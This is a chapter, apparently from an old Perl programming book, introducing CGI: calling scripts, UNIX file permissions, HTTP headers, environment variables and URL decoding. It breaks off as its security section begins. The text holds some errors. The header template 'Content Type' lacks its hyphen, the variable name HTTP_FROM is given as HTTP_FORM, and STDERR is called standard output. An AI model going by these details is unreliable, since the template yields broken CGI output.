<HTML>

<HEAD>

<TITLE>Chapter 19  -- What Is CGI?</TITLE>



<META>

</HEAD>

<BODY TEXT="#000000" BGCOLOR="#FFFFFF" LINK="#0000EE" VLINK="#551A8B" ALINK="#CE2910">

<H1><FONT SIZE=6 COLOR=#FF0000>Chapter&nbsp;19</FONT></H1>

<H1><FONT SIZE=6 COLOR=#FF0000>What Is CGI?</FONT></H1>

<HR>

<P>

<CENTER><B><FONT SIZE=5>CONTENTS</FONT></B></CENTER>

<UL>

<LI><A HREF="#WhyUsePerlforCGI">

Why Use Perl for CGI?</A>

<LI><A HREF="#CGIAppsversusJavaApplets">

CGI Apps versus Java Applets</A>

<LI><A HREF="#ShouldYouUseCGIModules">

Should You Use CGI Modules?</A>

<LI><A HREF="#HowDoesCGIWork">

How Does CGI Work?</A>

<LI><A HREF="#CallingYourCGIProgram">

Calling Your CGI Program</A>

<LI><A HREF="#YourFirstCGIProgram">

Your First CGI Program</A>

<LI><A HREF="#WhyAreFilePermissionsImportantinUNIX">

Why Are File Permissions Important in UNIX?</A>

<LI><A HREF="#HTTPHeaders">

HTTP Headers</A>

<LI><A HREF="#CGIandEnvironmentVariables">

CGI and Environment Variables</A>

<LI><A HREF="#URLENCoding">

URL ENCoding</A>

<LI><A HREF="#Security">

Security</A>

<LI><A HREF="#CGIwrapandSecurity">

CGIwrap and Security</A>

<LI><A HREF="#Cookies">

Cookies</A>

<UL>

<LI><A HREF="#CookieSecurity">

Cookie Security</A>

<LI><A HREF="#HowAreCookiesCreatedandRead">

How Are Cookies Created and Read?</A>

<LI><A HREF="#CanaVisitorsBrowserSupportCookies">

Can a Visitor's Browser Support Cookies?</A>

</UL>

<LI><A HREF="#DebuggingCGIPrograms">

Debugging CGI Programs</A>

<UL>

<LI><A HREF="#SendingOutputtotheServersLogFile">

Sending Output to the Server's Log File</A>

<LI><A HREF="#SendingSTDERRtotheWebBrowser">

Sending STDERR to the Web Browser</A>

<LI><A HREF="#CGITap">

CGITap</A>

<LI><A HREF="#GeneratinganErrorHTMLPage">

Generating an Error HTML Page</A>

</UL>

<LI><A HREF="#Summary">

Summary</A>

<LI><A HREF="#ReviewQuestions">

Review Questions</A>

<LI><A HREF="#ReviewExercises">

Review Exercises</A>

</UL>



<HR>

<P>

CGI, or <I>Common Gateway Interface</I>, is the standard programming

interface between Web servers and external programs. It is one

of the most exciting and fun areas of programming today. The CGI

standard lets Web browsers pass information to programs written

in any language. If you want to create a lightning-fast search

engine, then your CGI program will most likely be written in C

or C++. However, most other applications can use Perl.

<P>

The CGI standard does not exist in isolation; it is dependent

on the HTML and HTTP standards. HTML is the standard that lets

Web browsers understand document content. HTTP is the communications

protocol that, among other things, lets Web servers talk with

Web browsers.<BR>

<p>

<CENTER>

<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>

<TR><TD><B>Note</B></TD></TR>

<TR><TD>

<BLOCKQUOTE>

If you are unfamiliar with HTML, you might want to skip to the HTML introduction in <A HREF="ch20.htm" >Chapter 20</A>, &quot;Form Processing,&quot; before continuing. Otherwise, take the HTML refereNCes in this chapter at face value.</BLOCKQUOTE>



</TD></TR>

</TABLE>

</CENTER>

<P>

<P>

Almost anyone can throw together some HTML and hang a &quot;home

page&quot; out on the Web. But most sites out there are, quite

frankly, boring. Why? The fact is that most sites are built as

a simple series of HTML documents that never change. The site

is completely static. No one is likely to visit a static page

more than oNCe or twice. Think about the sites you visit most

often. They probably have some interesting content, certainly,

but more importantly, they have dynamic content.

<P>

So what's a Webmaster to do? No Webmaster has the time to update

his or her Web site by hand every day. Fortunately, the people

who developed the Web protocol thought of this problem and gave

us CGI. CGI gives you a way to make Web sites dynamic and interactive.

<P>

Each word in the acronym Common Gateway Interface helps you to

understand the interface:

<UL>

<LI><B>Common</B>-interacts with many different operating systems.

<LI><B>Gateway</B>-provides users with a way to gain access to

different programs, such as databases or picture generators.

<LI><B>Interface</B>-uses a well-defined method to interact with

a Web server.

</UL>

<P>

CGI applications can perform nearly any task that your imagination

can think up. For example, you can create Web pages on-the-fly,

access databases, hold telnet sessions, generate graphics, and

compile statistics.

<P>

The basic coNCept behind CGI is pretty simple; however, actually

creating CGI applications is not. That requires real programming

skills. You need to be able to debug programs and make logical

connections between one idea and another. You also need to have

the ability to visualize the application that you'd like to create.

This chapter and the next, &quot;Form Processing,&quot; will get

you started with CGI programming. If you plan to create large

applications, you might want to look at Que's <I>Special Edition

Using CGI</I>.

<H2><A NAME="WhyUsePerlforCGI"><FONT SIZE=5 COLOR=#FF0000>

Why Use Perl for CGI?</FONT></A></H2>

<P>

Perl is the de facto standard for CGI programming for a number

of reasons, but perhaps the most important are:

<UL>

<LI><B>Socket Support</B>-create programs that interface seamlessly

with Internet protocols. Your CGI program can send a Web page

in response to a transaction and send a series of e-mail messages

to inform interested people that the transaction happened.

<LI><B>Pattern Matching</B>-ideal for handling form data and searching

text.

<LI><B>Flexible Text Handling</B>-no details to worry. The way

that Perl handles strings, in terms of memory allocation and deallocation,

fades into the background as you program. You simply can ignore

the details of coNCatenating, copying, and creating new strings.

</UL>

<P>

The advantage of an interpreted language in CGI applications is

its simplicity in development, debugging, and revision. By removing

the compilation step, you and I can move more quickly from task

to task, without the frustration that can sometimes arise from

debugging compiled programs. Of course, not any interpreted language

will do. Perl has the distiNCt advantage of having an extremely

rich and capable fuNCtionality.

<P>

There are some times when a mature CGI application should be ported

to C or another compiled language. These are the Web applications

where speed is important. If you expect to have a very active

site, you probably want to move to a compiled language because

they run faster.

<H2><A NAME="CGIAppsversusJavaApplets"><FONT SIZE=5 COLOR=#FF0000>

CGI Apps versus Java Applets</FONT></A></H2>

<P>

CGI and Java are two totally different animals. CGI is a specification

that can be used by any programming language. CGI applications

are run on a Web server. Java is a programming language that is

run on the client side.

<P>

CGI applications should be designed to take advantage of the centralized

nature of a Web server. They are great for searching databases,

processing HTML form data, and other applications that require

limited interaction with a user.

<P>

Java applications are good when you need a high degree of interaction

with users: for example, games or animation.

<P>

Java programs need to be kept relatively small because they are

transmitted through the Internet to the client. CGI applications,

on the other hand, can be as large as needed because they reside

and are executed on the Web server.

<P>

You can design your Web site to use both Java and CGI applications.

For example, you might want to use Java on the client side to

do field validation when collecting information on a form. Then

oNCe the input has been validated, the Java application can send

the information to a CGI application on the Web server where the

database resides.

<H2><A NAME="ShouldYouUseCGIModules"><FONT SIZE=5 COLOR=#FF0000>

Should You Use CGI Modules?</FONT></A></H2>

<P>

I eNCourage you to use the CGI modules that are available on the

Internet. The most up-to-date module that I know about is called

<TT>cgi.pm</TT>-but you must be using

Perl v5.002 or an even newer version in order to use it. <TT>cgi.pm</TT>

is very comprehensive and covers many different protocols in addition

to the basic CGI standard.

<P>

You might find that <TT>cgi.pm</TT>

is overkill for simple CGI applications. If so, look at <TT>cgi-lite.pl</TT>.

This library doesn't do as much as <TT>cgi.pm</TT>

but you'll probably find that it is easier to use.

<P>

You can find both of these scripts at one of the CPAN Web sites

that are mentioned in <A HREF="ch22.htm" >Chapter 22</A>, &quot;Internet Resources.&quot;

<P>

However, in this book, I have purposely not used these scripts.

I feel it is important for you to understand the mechanisms behind

the protocols. This will make debugging your applications easier

because you'll have a better idea what the modules are doing behind

the scenes. You will also be able to make better use of pre-existing

modules if you can make educated guesses about what a poorly documented

fuNCtion does.

<H2><A NAME="HowDoesCGIWork"><FONT SIZE=5 COLOR=#FF0000>

How Does CGI Work?</FONT></A></H2>

<P>

CGI programs are always placed on a disk that the Web server has

access to. This means that if you are using a dial-up account

to maintain your Web site, you need to upload your CGI programs

to the server before they can be run.<BR>

<p>

<CENTER>

<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>

<TR><TD><B>Tip</B></TD></TR>

<TR><TD>

<BLOCKQUOTE>

You can test your scripts locally as long as you can use Perl on your local machine. See the &quot;Debugging&quot; section later in this chapter.</BLOCKQUOTE>



</TD></TR>

</TABLE>

</CENTER>

<P>

<P>

Web servers are generally configured so that all CGI applications

are placed into a <TT>cgi-bin</TT>

directory. However, the Web server may have aliases so that &quot;virtual

directories&quot; exist. Each user might have his or her own <TT>cgi-bin</TT>

directory. The directory location is totally under the control

of your Web site administrator.<BR>

<p>

<CENTER>

<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>

<TR><TD><B>Tip</B></TD></TR>

<TR><TD>

<BLOCKQUOTE>

Finding out which directory your scripts need to be placed in is the first step in creating CGI programs. Because you need to get this information from your Web site administrator, send an e-mail message right now requesting this information. Also ask if 
there are any CGI restrictions or guidelines that you need to follow.</BLOCKQUOTE>



</TD></TR>

</TABLE>

</CENTER>

<P>

<H2><A NAME="CallingYourCGIProgram"><FONT SIZE=5 COLOR=#FF0000>

Calling Your CGI Program</FONT></A></H2>

<P>

The easiest way to run a CGI program is to type in the URL of

the program into your Web browser. The Web server should recognize

that you are requesting a CGI program and execute it. For example,

if you already had a CGI program called <TT>test.pl</TT>

running on a local Web server, you could start it by entering

the following URL into your Web browser:

<BLOCKQUOTE>

<PRE>

http://localhost/cgi-bin/test.pl

</PRE>

</BLOCKQUOTE>

<P>

The Web server will execute your CGI script and any output is

displayed by your Web browser.

<P>

The URL for your CGI program is a <I>virtual</I> path. The actual

location of the script on the Web server depends on the configuration

of the server software and the type of computer being used. For

example, if your computer is running the Linux operating system

and the NCSA Web server in a &quot;standard&quot; configuration,

then the above virtual would translate into <TT>/usr/local/etc/httpd/cgi-bin/test.pl</TT>.

If you were running the Website server under Windows 95, the translated

path might be <TT>/website/cgi-shl/test.pl</TT>.

<P>

If you have installed and are administering the Web server yourself,

you probably know where to place your scripts. If you are using

a service provider's Web server, ask the server's administrator

where to put your scripts and how to refereNCe them from your

documents.

<P>

There are other ways to invoke CGI programs besides using a Web

browser to visit the URL. You can also start CGI programs from:

<UL>

<LI>a hypertext link. For example:

</UL>

<BLOCKQUOTE>

<PRE>

&lt;A HREF=&quot;cgi-bin/test.pl&quot;&gt;Click here to run a CGI program&lt;/A&gt;

</PRE>

</BLOCKQUOTE>

<UL>

<LI>a button on an HTML form. You can read more about HTML forms

in <A HREF="ch20.htm" >Chapter 20</A>, &quot;Form Processing.&quot;

<LI>a server-side iNClude. You can read more about server-side

iNCludes in <A HREF="ch20.htm" >Chapter 20</A>, &quot;Form Processing.&quot;

</UL>

<P>

Interestingly enough, you can pass information to your CGI program

by adding extra information to the standard URL. If your CGI program

is used for searching your site, for example, you can pass some

information to specify which directory to search. The following

HTML hyperlink will invoke a search script and tell it to search

the <TT>/root/document</TT> directory.

<BLOCKQUOTE>

<PRE>

&lt;A HREF=&quot;cgi-bin/search.pl/root/document&quot;&gt;Search the Document 

Directory &lt;A&gt;

</PRE>

</BLOCKQUOTE>

<P>

This <I>extra</I> path information can be accessed through the

<TT>PATH_INFO</TT> environment variable.

<P>

You can also use a question mark to pass information to a CGI

program. Typically, a question mark indicates that you are passing

keywords that will be used in a search.

<BLOCKQUOTE>

<PRE>

&lt;A HREF=&quot;cgi-bin/search.pl?Wine+1993&quot;&gt;Search for 1993 Wines&lt;/A&gt;

</PRE>

</BLOCKQUOTE>

<P>

The information that follows the question mark will be available

to your CGI program through the <TT>QUERY_STRING</TT>

environment variables.

<P>

Using either of these approaches will let you create <I>canned</I>

CGI requests. By creating these requests ahead of time, you can

reduce the amount of typing errors that your users might otherwise

have. Later in this chapter, the &quot;CGI and Environment Variables&quot;

section discusses all of the environment variables you can use

inside CGI programs.<BR>

<p>

<CENTER>

<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>

<TR><TD><B>Note</B></TD></TR>

<TR><TD>

<BLOCKQUOTE>

Generally speaking, visitors to your Web site should never have to type in the URL for a CGI program. A hypertext link should always be provided to start the program.</BLOCKQUOTE>



</TD></TR>

</TABLE>

</CENTER>

<P>

<H2><A NAME="YourFirstCGIProgram"><FONT SIZE=5 COLOR=#FF0000>

Your First CGI Program</FONT></A></H2>

<P>

You can use any text editor or word processor in the world to

create your CGI programs because they are simply Perl programs

that are invoked by a URL instead of the command line. Listing

19.1 contains a five-line CGI program-nearly the smallest program

you can have.

<P>

<IMG SRC="pseudo.gif" BORDER=1 ALIGN=RIGHT><p>

<BLOCKQUOTE>

<I>Turn on the warning option.<BR>

<I>Turn on the strict pragma.<BR>

<I>Send the HTTP header to the Web browser.<BR>

<I>Send a line of text to the Web browser.</I></I></I></I>

</BLOCKQUOTE>

<HR>

<BLOCKQUOTE>

<B>Listing 19.1&nbsp;&nbsp;19LST01.PL-A Very Small CGI Program

<BR>

</B>

</BLOCKQUOTE>

<BLOCKQUOTE>

<PRE>

#!/usr/local/bin/perl -w

use strict;



print &quot;Content-type: text/plain\n\n&quot;;

print &quot;Hello, World.\n&quot;;

</PRE>

</BLOCKQUOTE>

<HR>

<P>

The file that contains this CGI program should be placed in your

Web server's <TT>cgi-bin</TT> directory.

Then, the URL for this program will be something like <TT>http://localhost/cgi-bin/test.pl</TT>

(change localhost to correspond to your Web server's hostname).

Enter this URL into your Web browser and it should display a Web

page saying &quot;This is a test.&quot;<BR>

<p>

<CENTER>

<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>

<TR><TD><B>Note</B></TD></TR>

<TR><TD>

<BLOCKQUOTE>

You may wonder how the Web server knows that a CGI program should be executed instead of being displayed. This is an excellent question. It can be best answered by referring to the documentation that came with your particular server.</BLOCKQUOTE>



</TD></TR>

</TABLE>

</CENTER>

<P>

<P>

When the Web server executes your CGI program, it automatically

opens the <TT>STDIN</TT>, <TT>STDOUT</TT>,

and <TT>STDERR </TT>file handles for

you.

<UL>

<LI><TT><B><FONT FACE="Courier">STDIN</FONT></B></TT>-The standard

input of your CGI program might contain information that was generated

by an HTML form. Otherwise, you shouldn't use STDIN. See &quot;Inputs

to Your CGI Program&quot; later in this chapter for more information.

<LI><TT><B><FONT FACE="Courier">STDOUT</FONT></B></TT>-The standard

output of your CGI program is linked to the <TT>STDIN</TT>

of the Web browser. This means that when you print information

using the <TT>print()</TT> fuNCtion,

you are essentially writing directly to the Web browser's window.

This link will be discussed further in the &quot;HTTP Headers&quot;

section later in this chapter.

<LI><TT><B><FONT FACE="Courier">STDERR</FONT></B></TT>-The standard

output of your CGI program is linked to the Web server's log file.

This is very useful when you are debugging your program. Any output

from the <TT>die()</TT> or <TT>warn()</TT>

fuNCtion will be placed into the server's log file. The STDERR

file handle is discussed further in the &quot;Debugging CGI Programs&quot;

section later in this chapter.

</UL>

<P>

The Web server will also make some information available to your

CGI program through environment variables. You may recall the

<TT>%ENV</TT> hash from <A HREF="ch12.htm" >Chapter 12</A>,

&quot;Using Special Variables.&quot; Details about the environment

variables you can use can be found in the &quot;Environment Variables&quot;

section later in this chapter.

<H2><A NAME="WhyAreFilePermissionsImportantinUNIX"><FONT SIZE=5 COLOR=#FF0000>

Why Are File Permissions Important in UNIX?</FONT></A></H2>

<P>

File permission controls can access files in UNIX systems. Quite

often, I hear of beginning CGI programmers who try to write files

into a directory in which they do not have write permission. UNIX

permissions are also called <I>rights</I>.

<P>

UNIX can control file access in a number of ways. There are three

levels of permissions for three classes of users. To view the

permissions on a file use the <TT>ls<I> </I></TT>command

with the <TT>-l</TT> command-line

option. For example:

<BLOCKQUOTE>

<PRE>

C:indyunix:~/public_html/pfind&gt;<B>ls -l

</B>total 40

-rw-r--r--   1 dbewley  staff        139 Jun 18 14:14 home.html

-rwxr-xr-x   1 dbewley  staff       9145 Aug 14 07:06 pfind

drwxr-xr--   2 dbewley  staff        512 Aug 15 07:11 tmp

</PRE>

</BLOCKQUOTE>

<P>

Each line of this listing indicates a separate directory entry.

The first character of the first column is normally either a dash

or the letter <TT>d</TT>. If a directory

entry has a <TT>d</TT>, it means that

the entry is a subdirectory of the current directory.

<P>

The other nine characters are the file permissions. Permissions

should be thought of in groups of three, for the three classes

of user. The three classes of user are:

<UL>

<LI><B>user</B>-the owner of the file or directory. The owner's

name is displayed in the third column of the <TT>ls</TT>

command's output.

<LI><B>group</B>-the group that owns the file. Files can have

both individual owners and a group. Several users can belong to

a single group.

<LI><B>others</B>-any user that is not the owner or in the group

that owns the file.

</UL>

<P>

Each of the classes can have one or more of the following three

levels of permission:

<UL>

<LI><B>r</B>-the class can read the file or directory.

<LI><B>w</B>-the class can write to the file or directory.

<LI><B>x</B>-the class can execute the file or list the directory.

</UL>

<P>

If a permission is not allowed to the user that ran the <TT>ls</TT>

command, its position is filled with a dash. For example:

<BLOCKQUOTE>

<PRE>

<B>ls -l hform.html

</FONT></B><FONT SIZE=2 FACE="Courier">-rwx------   1 dbewley  staff      11816 May  9 09:19 slideshow.pl

</PRE>

</BLOCKQUOTE>

<P>

The owner, <TT>dbewley</TT>, has full

rights - read, write, and execute for this file. The group, staff,

and everyone else have no rights.<BR>

<p>

<CENTER>

<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>

<TR><TD><B>Tip</B></TD></TR>

<TR><TD>

<BLOCKQUOTE>

Perl scripts are not compiled; they must be read by the Perl interpreter each time they are run. Therefore, Perl scripts, unlike compiled programs, must have execute <FONT FACE="LI Helvetica Light Oblique">and</FONT> read permissions.

</BLOCKQUOTE>



</TD></TR>

</TABLE>

</CENTER>

<P>

<P>

Here is another example:

<BLOCKQUOTE>

<PRE>

<B>ls -l pfind.pl

</FONT></B><FONT SIZE=2 FACE="Courier">-rwxr-x--   1 dbewley  staff       2863 Oct 10 1995  pfind.pl

</PRE>

</BLOCKQUOTE>

<P>

This time, the owner has full access while the group staff can

read and execute the file. All others have no rights to this file.

<P>

Most HTML files will have permissions that look like this:

<BLOCKQUOTE>

<PRE>

<B>ls -l schedule.html

</FONT></B><FONT SIZE=2 FACE="Courier">-rw-r--r--   1 dbewley  staff       2439 Feb  8 1996  schedule.html

</PRE>

</BLOCKQUOTE>

<P>

Everyone can read it, but only the user can modify or delete it.

There is no need to have execute permission siNCe HTML is not

an executable language.

<P>

You can change the permissions on a file by using the <TT>chmod</TT>

command. The <TT>chmod</TT> command

recognizes the three classes of user as <TT>u</TT>,

<TT>g</TT>, and <TT>o</TT>

and the three levels of permissions as <TT>r</TT>,

<TT>w</TT>, and <TT>x</TT>.

It grants and revokes permissions with a <TT>+</TT>

or <TT>-</TT> in conjuNCtion with

each permission that you want to change. It also will accept an

<TT>a</TT> for all three classes of

users at oNCe.

<P>

The syntax of the <TT>chmod</TT> command

is:

<BLOCKQUOTE>

<PRE>

chmod &lt;options&gt; &lt;file&gt;

</PRE>

</BLOCKQUOTE>

<P>

Here are some examples of the <TT>chmod</TT>

command in action

<BLOCKQUOTE>

<PRE>

<B>ls -l pfind.pl

</FONT></B><FONT SIZE=2 FACE="Courier">-rw------   1 dbewley  staff       2863 Oct 10 1995  pfind.pl

<B>chmod u+x pfind.pl

ls -l pfind.pl

</B>-rwx------   1 dbewley  staff       2863 Oct 10 1995  pfind.pl

</PRE>

</BLOCKQUOTE>

<P>

The first <TT>ls</TT> command shows

you the original file permissions. Then, the <TT>chmod</TT>

command add execute permission for the owner (or user) of <TT>pfind.pl</TT>.

The second <TT>ls</TT> command displays

the newly changed permissions.

<P>

To add these permissions for both the group and other classes,

use <TT>go+rx</TT> as in the following

example. Remember, users must have at least read and execute permissions

to run Perl scripts.

<BLOCKQUOTE>

<PRE>

<B>ls -l pfind.pl

</FONT></B><FONT SIZE=2 FACE="Courier">-rwx------   1 dbewley  staff       2863 Oct 10 1995  pfind.pl

<B>chmod go+rx pfind.pl

ls -l pfind.pl

</B>-rwxr-xr-x   1 dbewley  staff       2863 Oct 10 1995  pfind.pl

</PRE>

</BLOCKQUOTE>

<P>

Now, any user can read and execute <TT>pfind.pl</TT>.

Let's say a serious bug was found in pfind.pl and we don't want

it to be executed by anyone. To revoke execute permission for

all classes of users, use the <TT>a-x</TT>

option with the <TT>chmod</TT> command.

<BLOCKQUOTE>

<PRE>

<B>ls -l pfind.pl

</FONT></B><FONT SIZE=2 FACE="Courier">-rwxr-xr-x   1 dbewley  staff       2863 Oct 10 1995  pfind.pl

<B>chmod a-x pfind.pl

ls -l pfind.pl

</B>-rw-r--r--   1 dbewley  staff       2863 Oct 10 1995  pfind.pl

</PRE>

</BLOCKQUOTE>

<P>

Now, all users can read <TT>pfind.pl</TT>,

but no one can execute it.

<H2><A NAME="HTTPHeaders"><FONT SIZE=5 COLOR=#FF0000>

HTTP Headers</FONT></A></H2>

<P>

The first line of output for most CGI programs must be an HTTP

header that tells the client Web browser what type of output it

is sending back via <TT>STDOUT</TT>.

Only scripts that are called from a server-side iNClude are exempt

from this requirement.<BR>

<P>

<CENTER><B>Table 19.1&nbsp;&nbsp;A List of HTTP Headers</B></CENTER>

<p>

<CENTER>

<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>

<TR><TD WIDTH=166><I>Response Type</I></TD><TD WIDTH=238><I>HTTP Header</I>

</TD></TR>

<TR><TD WIDTH=166>Text</TD><TD WIDTH=238>Content Type: text/plain

</TD></TR>

<TR><TD WIDTH=166>HTML page</TD><TD WIDTH=238>Content Type: text/html

</TD></TR>

<TR><TD WIDTH=166>Gif graphic</TD><TD WIDTH=238>Content Type: image/gif

</TD></TR>

<TR><TD WIDTH=166>Redirection to another Web page</TD><TD WIDTH=238>Location: http://www.foobar.com

</TD></TR>

<TR><TD WIDTH=166>Cookie</TD><TD WIDTH=238>Set-cookie: ...</TD>

</TR>

<TR><TD WIDTH=166>Error Message</TD><TD WIDTH=238>Status: 402 

</TD></TR>

</TABLE>

</CENTER>

<P>

<P>

All HTTP headers must be followed by a blank line. Use the following

line of code as a template:

<BLOCKQUOTE>

<PRE>

print(&quot;Content Type: text/html\n\n&quot;);

</PRE>

</BLOCKQUOTE>

<P>

Notice that the HTTP header is followed by <I>two</I> newline

characters. This is very important. It ensures that a blank line

will always follow the HTTP header.

<P>

If you have installed any helper applications for Netscape or

are familiar with MIME types, you already recognize the <TT>text/plain</TT>

and <TT>text/html</TT> parts of the

<TT>Content Type</TT> header. They

tell the remote Web browser what type of information you are sending.

The two most common MIME types to use are <TT>text/plain</TT>

and <TT>text/html</TT>.

<P>

The <TT>Location</TT> header is used

to redirect the client Web browser to another Web page. For example,

let's say that your CGI script is designed to randomly choose

from among 10 different URLs in  order to determine the next Web

page to display. ONCe the new Web page is chosen, your program

outputs it like this:

<BLOCKQUOTE>

<PRE>

print(&quot;Location: $nextPage\n\n&quot;);

</PRE>

</BLOCKQUOTE>

<P>

ONCe the <TT>Location</TT> header

has been printed, nothing else should be printed. That is all

the information that the client Web browser needs.

<P>

Cookies and the <TT>Set-cookie:</TT>

header are discussed in the &quot;Cookies&quot; section later

in this chapter.

<P>

The last type of HTTP header is the <TT>Status</TT>

header. This header should be sent when an error arises in your

script that your program is not equipped to handle. I feel that

this HTTP header should not be used unless you are under severe

time pressure to complete a project. You should try to create

your own error handling routines that display a full Web page

that explains the error that happened and what the user can do

to fix or circumvent it. You might iNClude the time, date, type

of error, contact names and phone numbers, and any other information

that might be useful to the user. Relying on the standard error

messages of the Web server and browser will make your Web site

less user friendly.

<H2><A NAME="CGIandEnvironmentVariables"><FONT SIZE=5 COLOR=#FF0000>

CGI and Environment Variables</FONT></A></H2>

<P>

You are already familiar with environment variables if you read

<A HREF="ch12.htm" >Chapter 12</A>, &quot;Using Special Variables.&quot; When your CGI

program is started, the Web server creates and initializes a number

of environment variables that your program can access using the

<TT>%ENV</TT> hash.

<P>

Table 19.2 contains a short description of each environment variable.

A complete description of the environmental variables used in

CGI programs can be found at

<BLOCKQUOTE>

<PRE>

http://www.ast.cam.ac.uk/~drtr/cgi-spec.html

<BR>



</PRE>

</BLOCKQUOTE>

<P>

<CENTER><B>Table 19.2&nbsp;&nbsp;CGI Environment Variables</B></CENTER>

<p>

<CENTER>

<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>

<TR><TD WIDTH=199><I>Variable Name</I></TD><TD WIDTH=391><I>Description</I>

</TD></TR>

<TR><TD WIDTH=199>AUTH_TYPE</TD><TD WIDTH=391>Optionally provides the authentication protocol used to access your script if the local Web server supports authentication and if  authentication was used to access your script.

</TD></TR>

<TR><TD WIDTH=199>CONTENT_LENGTH</TD><TD WIDTH=391>Optionally provides the length, in bytes, of the content provided to the script through the <TT>STDIN </TT>file handle. Used particularly in the <TT>POST</TT> method of form processing. See <A 
HREF="ch20.htm" >Chapter 20</A>, &quot;Form Processing,&quot; for more information.

</TD></TR>

<TR><TD WIDTH=199>CONTENT_TYPE</TD><TD WIDTH=391>Optionally provides the type of content available from the <TT>STDIN</TT> file handle. This is used for the <TT>POST</TT> method of form processing. Most of the time, this variable will be blank and you can 
assume a value of <TT>application/octet-stream</TT>. 

</TD></TR>

<TR><TD WIDTH=199>GATEWAY_INTERFACE</TD><TD WIDTH=391>Provides the version of CGI supported by the local Web server. Most of the time, this will be equal to <TT>CGI/1.1</TT>.

</TD></TR>

<TR><TD WIDTH=199>HTTP_AccEPT</TD><TD WIDTH=391>Provides a comma-separated list of MIME types the browser software will accept. You might check this environmental variable to see if the client will accept a certain kind of graphic file.

</TD></TR>

<TR><TD WIDTH=199>HTTP_FORM</TD><TD WIDTH=391>Provides the user's e-mail address. Not all Web browsers will supply this information to your server. Therefore, use this field only to provide a default value for an HTML form.

</TD></TR>

<TR><TD WIDTH=199>HTTP_USER_AGENT</TD><TD WIDTH=391>Provides the type and version of the user's Web browser. For example, the Netscape Web browser is called Mozilla.

</TD></TR>

<TR><TD WIDTH=199>PATH_INFO</TD><TD WIDTH=391>Optionally contains any extra path information from the HTTP request that invoked the script.

</TD></TR>

<TR><TD WIDTH=199>PATH_TRANSLATED</TD><TD WIDTH=391>Maps the script's virtual path (i.e., from the root of the server directory) to the physical path used to call the script.

</TD></TR>

<TR><TD WIDTH=199>QUERY_STRING</TD><TD WIDTH=391>Optionally contains form information when the GET method of form processing is used. QUERY_STRING is also used for passing information such as search keywords to CGI scripts.

</TD></TR>

<TR><TD WIDTH=199>REMOTE_ADDR</TD><TD WIDTH=391>Contains the dotted decimal address of the user.

</TD></TR>

<TR><TD WIDTH=199>REMOTE_HOST</TD><TD WIDTH=391>Optionally provides the domain name for the site that the user has connected from.

</TD></TR>

<TR><TD WIDTH=199>REMOTE_IDENT</TD><TD WIDTH=391>Optionally provides client identification when your local server has contacted an IDENTD server on a client machine. You will very rarely see this because the IDENTD query is slow.

</TD></TR>

<TR><TD WIDTH=199>REMOTE_USER</TD><TD WIDTH=391>Optionally provides the name used by the user to access your secured script. 

</TD></TR>

<TR><TD WIDTH=199>REQUEST_METHOD</TD><TD WIDTH=391>Usually contains either &quot;GET&quot; or &quot;POST&quot;-the method by which form information will be made available to your script. See <A HREF="ch20.htm" >Chapter 20</A>, &quot;Form Processing,&quot; 
for more information.

</TD></TR>

<TR><TD WIDTH=199>SCRIPT_NAME</TD><TD WIDTH=391>Contains the virtual path to the script.

</TD></TR>

<TR><TD WIDTH=199>SERVER_NAME</TD><TD WIDTH=391>Contains the configured hostname for the server.

</TD></TR>

<TR><TD WIDTH=199>SERVER_PORT</TD><TD WIDTH=391>Contains the port number that the local Web server software is listening on. The standard port number is 80.

</TD></TR>

<TR><TD WIDTH=199>SERVER_PROTOCOL</TD><TD WIDTH=391>Contains the version of the Web protocol this server uses. For example, <TT>HTTP/1.0</TT>.

</TD></TR>

<TR><TD WIDTH=199>SERVER_SOFTWARE</TD><TD WIDTH=391>Contains the name and version of the Web server software. For example, <TT>WebSite/1.1e</TT>.

</TD></TR>

</TABLE>

</CENTER>

<P>

<H2><A NAME="URLENCoding"><FONT SIZE=5 COLOR=#FF0000>

URL ENCoding</FONT></A></H2>

<P>

One of the limitations that the WWW organizations have placed

on the HTTP protocol is that the content of the commands, responses,

and data that are passed between client and server should be clearly

defined. It is sometimes difficult to tell simply from the context

whether a space character is a field delimiter or an actual space

character to add whitespace between two words.

<P>

To clear up the ambiguity, the URL eNCoding scheme was created.

Any spaces are converted into plus (<TT>+</TT>)

signs to avoid semantic ambiguities. In addition, special characters

or 8-bit values are converted into their hexadecimal equivalents

and prefaced with  a percent sign (<TT>%</TT>).

For example, the string <TT>Davy Jones &lt;dj@planet.net&gt;</TT>

is eNCoded as <TT>Davy+Jones+%3Cdj@planet.net%3E</TT>.

If you look closely, you see that the <TT>&lt;</TT>

character has been converted to <TT>%3C</TT>

and the <TT>&gt;</TT> character has

been coverted to <TT>%3E</TT>.

<P>

Your CGI script will need to be able to convert URL eNCoded information

back into its normal form. Fortunately, Listing 19.2 contains

a fuNCtion that will convert URL eNCoded.

<P>

<IMG SRC="pseudo.gif" BORDER=1 ALIGN=RIGHT><p>

<BLOCKQUOTE>

<I>Define the </I><TT><I>decodeURL()</I></TT><I>

fuNCtion.<BR>

Get the eNCoded string from the parameter array.<BR>

Translate all plus signs into spaces.<BR>

Convert character coded as hexadecimal digits into regular characters.

<BR>

Return the decoded string.</I>

</BLOCKQUOTE>

<HR>

<BLOCKQUOTE>

<B>Listing 19.2&nbsp;&nbsp;19LST02.PL-How to Decode the URL ENCoding

<BR>

</B>

</BLOCKQUOTE>

<BLOCKQUOTE>

<PRE>

sub decodeURL {

    $_ = shift;

    tr/+/ /;

    s/%(..)/pack('c', hex($1))/eg;

    return($_);

}

</PRE>

</BLOCKQUOTE>

<HR>

<P>

This fuNCtion will be used in <A HREF="ch20.htm" >Chapter 20</A>, &quot;Form Processing,&quot;

to decode form information. It is presented here because canned

queries also use URL eNCoding.

<H2><A NAME="Security"><FONT SIZE=5 COLOR=#FF0000>

Security</FONT></A></H2>

<P>

CGI really has only one large security hole that I can see. If

you pass information that came from a remote site to an operating

system command, you are asking for trouble. I think an example

is needed to understand the problem because it is not obvious.

<P>

Suppose that you had a CGI script that formatted a directory listing

and generated a Web page that let visitors view the listing. In

